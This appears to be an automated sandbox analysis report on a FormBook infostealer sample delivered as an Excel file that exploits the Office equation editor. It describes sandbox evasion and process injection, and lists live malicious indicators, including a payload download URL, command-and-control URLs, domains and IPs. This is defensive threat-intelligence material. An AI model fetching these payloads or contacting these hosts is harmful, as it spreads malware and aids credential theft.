      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Yara detected AntiVM3Show sources
      Source: Yara matchFile source: 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2976, type: MEMORYSTR
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000000C85E4 second address: 00000000000C85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000000C897E second address: 00000000000C8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1868Thread sleep time: -180000s >= -30000s
      Source: C:\Users\Public\vbc.exe TID: 1828Thread sleep time: -38487s >= -30000s
      Source: C:\Users\Public\vbc.exe TID: 1016Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
      Source: C:\Users\Public\vbc.exeCode function: 8_2_004088B0 rdtsc
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 38487
      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000009.00000000.487770072.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: vmware
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
      Source: explorer.exe, 00000009.00000000.487770072.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: VMWARE
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: explorer.exe, 00000009.00000000.499415292.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
      Source: explorer.exe, 00000009.00000000.523219714.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
      Source: explorer.exe, 00000009.00000000.505298411.00000000083A6000.00000004.00000001.sdmpBinary or memory string: .SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: vbc.exe, 00000006.00000002.481016134.00000000023ED000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
      Source: C:\Users\Public\vbc.exeCode function: 8_2_004088B0 rdtsc
      Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
      Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: Debug
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00A826F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 11_2_01F526F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
      Source: C:\Users\Public\vbc.exeCode function: 8_2_00409B20 LdrLoadDll,
      Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeDomain query: www.americanstonesusa.com
      Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80
      Source: C:\Windows\explorer.exeDomain query: www.realstyleworks.com
      Source: C:\Windows\explorer.exeDomain query: www.plasticplank.com
      Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exeNetwork Connect: 192.99.131.252 80
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 2F0000
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
      Source: C:\Users\Public\vbc.exeThread register set: target process: 1764
      Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 1764
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: explorer.exe, 00000009.00000000.499712873.0000000000750000.00000002.00020000.sdmp, ipconfig.exe, 0000000B.00000002.687764984.0000000000840000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
      Source: explorer.exe, 00000009.00000000.499712873.0000000000750000.00000002.00020000.sdmp, ipconfig.exe, 0000000B.00000002.687764984.0000000000840000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: explorer.exe, 00000009.00000000.499712873.0000000000750000.00000002.00020000.sdmp, ipconfig.exe, 0000000B.00000002.687764984.0000000000840000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.541191725.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687551604.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.540998722.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.540894487.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.506424858.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.498846912.0000000009AA6000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.687510611.0000000000290000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.481283058.00000000033B9000.00000004.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncSystem Information Discovery113Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Extra Window Memory Injection1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 483668 Sample: ORDER CONFIRMATION.xlsx Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 39 www.thaysay.net 2->39 41 www.thaibinhgear.com 2->41 43 20 other IPs or domains 2->43 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 16 other signatures 2->67 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 34 36 2->15         started        signatures3 process4 dnsIp5 45 198.23.212.143, 49167, 80 AS-COLOCROSSINGUS United States 10->45 33 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->33 dropped 35 C:\Users\Public\vbc.exe, PE32 10->35 dropped 85 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->85 17 vbc.exe 10->17         started        37 C:\Users\user\...\~$ORDER CONFIRMATION.xlsx, data 15->37 dropped file6 signatures7 process8 signatures9 53 Machine Learning detection for dropped file 17->53 55 Uses ipconfig to lookup or modify the Windows network settings 17->55 57 Tries to detect virtualization through RDTSC time measurements 17->57 59 Injects a PE file into a foreign processes 17->59 20 vbc.exe 17->20         started        23 vbc.exe 17->23         started        process10 signatures11 69 Modifies the context of a thread in another process (thread injection) 20->69 71 Maps a DLL or memory area into another process 20->71 73 Sample uses process hollowing technique 20->73 75 Queues an APC in another process (thread injection) 20->75 25 ipconfig.exe 20->25         started        28 explorer.exe 20->28 injected process12 dnsIp13 77 Modifies the context of a thread in another process (thread injection) 25->77 79 Maps a DLL or memory area into another process 25->79 81 Tries to detect virtualization through RDTSC time measurements 25->81 31 cmd.exe 25->31         started        47 americanstonesusa.com 192.99.131.252, 49168, 49183, 49198 OVHFR Canada 28->47 49 www.realstyleworks.com 28->49 51 5 other IPs or domains 28->51 83 System process connects to network (likely due to code injection or exploit) 28->83 signatures14 process15

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      ORDER CONFIRMATION.xlsx33%VirustotalBrowse
      ORDER CONFIRMATION.xlsx29%ReversingLabsDocument-Word.Exploit.CVE-2017-11882

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\Public\vbc.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      8.2.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
      http://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==0%Avira URL Cloudsafe
      http://www.authorjameswshepherdonline.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA==0%Avira URL Cloudsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://java.sun.com0%Avira URL Cloudsafe
      http://www.realstyleworks.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ==0%Avira URL Cloudsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.plasticplank.com/nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5P100%Avira URL Cloudmalware
      http://www.hanlansmojitovillage.net/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ==0%Avira URL Cloudsafe
      www.hanlansmojitovillage.net/nthe/0%Avira URL Cloudsafe
      http://www.onpar-golf.com/nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5P0%Avira URL Cloudsafe
      http://computername/printers/printername/.printer0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://198.23.212.143/ddr/vbc.exe100%Avira URL Cloudmalware
      http://servername/isapibackend.dll0%Avira URL Cloudsafe
      https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&amp;5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot0%Avira URL Cloudsafe
      http://www.thaysay.net/nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5P0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      plasticplank.com
      		34.102.136.180
      		truefalse
        		unknown
        thaibinhgear.com
        		45.252.248.16
        		truetrue
          		unknown
          hanlansmojitovillage.net
          		34.102.136.180
          		truefalse
            		unknown
            americanstonesusa.com
            		192.99.131.252
            		truetrue
              		unknown
              www.aedenpure.com
              		217.160.0.177
              		truefalse
                		unknown
                thaysay.net
                		34.102.136.180
                		truefalse
                  		unknown
                  requotation.com
                  		184.168.131.241
                  		truetrue
                    		unknown
                    realstyleworks.com
                    		34.98.99.30
                    		truefalse
                      		unknown
                      www.tomrings.com
                      		162.0.214.58
                      		truefalse
                        		unknown
                        cname.landingi.com
                        		52.212.68.12
                        		truefalse
                          		high
                          goldmig.com
                          		203.16.60.34
                          		truetrue
                            		unknown
                            authorjameswshepherdonline.com
                            		34.102.136.180
                            		truefalse
                              		unknown
                              oakridge-pm.com
                              		184.168.131.241
                              		truetrue
                                		unknown
                                onpar-golf.com
                                		34.102.136.180
                                		truefalse
                                  		unknown
                                  www.americanstonesusa.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.thaysay.net
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.asoboawa.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.realstyleworks.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.mysahuarita.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.oakridge-pm.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.renatradingbv.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.thaibinhgear.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.plasticplank.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.authorjameswshepherdonline.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.goldmig.com
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.onpar-golf.com
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.hanlansmojitovillage.net
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.requotation.com
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnot/hSP0U84YZk1QGO5z/hARin1ng6rxU4Y++sy6YdGpizQ==true
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.authorjameswshepherdonline.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=enVshZ5ucPnpEJ79XKthUFU7GSCP6zpooNwVCr/P0s5BKPQIOoeKppWI2ezsgMpUEHhlAA==false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.realstyleworks.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=QEezsAFDlNAB3yJURHSMHXjRGqVB06lXE20lDVvtKCtrVdaWOVmvQD4ln9eCVkj8l4WBCQ==false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.plasticplank.com/nthe/?5jo4nr=S+ZwTBrK0+7RoomNfSvQ9j84ffpxKdfieFGWtVtD4WHCIMGVYLqiZt07bDY98RTkl0TyTg==&t48tJ=fJEp_HN8mPiTHN5Pfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.hanlansmojitovillage.net/nthe/?t48tJ=fJEp_HN8mPiTHN5P&5jo4nr=54OfAHeKGwMzfFPkI96ZbDhctG36f6+/FiUzkHshmPfrtcl9VWH+3olASXX+4wyWJIckJQ==false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              www.hanlansmojitovillage.net/nthe/true
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              http://www.onpar-golf.com/nthe/?5jo4nr=B6rYep0Vm3M2EhGqYu/feA67U2SQJtGoCN7KN6fFlDVSMwI26b57yYW0nsnzi8vT4Ky8RQ==&t48tJ=fJEp_HN8mPiTHN5Pfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://198.23.212.143/ddr/vbc.exetrue
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              http://www.thaysay.net/nthe/?5jo4nr=JnpX3/YBBy9TCXbKhp8uYEFRBGzb3gJR2p4kRdES4yzOlzRdyh/c8y0xiKK/8z4KJyQSLA==&t48tJ=fJEp_HN8mPiTHN5Pfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              http://www.windows.com/pctv.explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpfalse
                                                                		high
                                                                http://investor.msn.comexplorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpfalse
                                                                  		high
                                                                  http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpfalse
                                                                    		high
                                                                    http://wellformedweb.org/CommentAPI/explorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.hotmail.com/oeexplorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpfalse
                                                                      		high
                                                                      http://treyresearch.netexplorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmpfalse
                                                                        		high
                                                                        http://java.sun.comexplorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.icra.org/vocabulary/.explorer.exe, 00000009.00000000.493715346.0000000002CC7000.00000002.00020000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000009.00000000.483450971.0000000001BE0000.00000002.00020000.sdmpfalse
                                                                          		high
                                                                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000009.00000000.487570517.000000000447A000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.day.com/dam/1.0CFE3BF36.emf.0.drfalse
                                                                              		high
                                                                              http://investor.msn.com/explorer.exe, 00000009.00000000.502008099.0000000002AE0000.00000002.00020000.sdmpfalse
                                                                                		high
                                                                                http://www.piriform.com/ccleanerexplorer.exe, 00000009.00000000.503345454.00000000044E7000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://computername/printers/printername/.printerexplorer.exe, 00000009.00000000.488322506.0000000004650000.00000002.00020000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		low
                                                                                  http://www.%s.comPAexplorer.exe, 00000009.00000000.483450971.0000000001BE0000.00000002.00020000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		low
                                                                                  http://www.autoitscript.com/autoit3explorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpfalse
                                                                                    		high
                                                                                    https://support.mozilla.orgexplorer.exe, 00000009.00000000.483010699.0000000000255000.00000004.00000020.sdmpfalse
                                                                                      		high
                                                                                      http://servername/isapibackend.dllexplorer.exe, 00000009.00000000.486663706.0000000003E50000.00000002.00020000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		low
                                                                                      https://www.americanstonesusa.com/nthe/?t48tJ=fJEp_HN8mPiTHN5P&amp;5jo4nr=TiWkgH4UkC7CIqz9ktcRQySnotipconfig.exe, 0000000B.00000002.688497436.00000000026B2000.00000004.00020000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown

                                                                                      Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      198.23.212.143
                                                                                      		unknownUnited States
                                                                                      		36352AS-COLOCROSSINGUStrue
                                                                                      34.102.136.180
                                                                                      		plasticplank.comUnited States
                                                                                      		15169GOOGLEUSfalse
                                                                                      34.98.99.30
                                                                                      		realstyleworks.comUnited States
                                                                                      		15169GOOGLEUSfalse
                                                                                      192.99.131.252
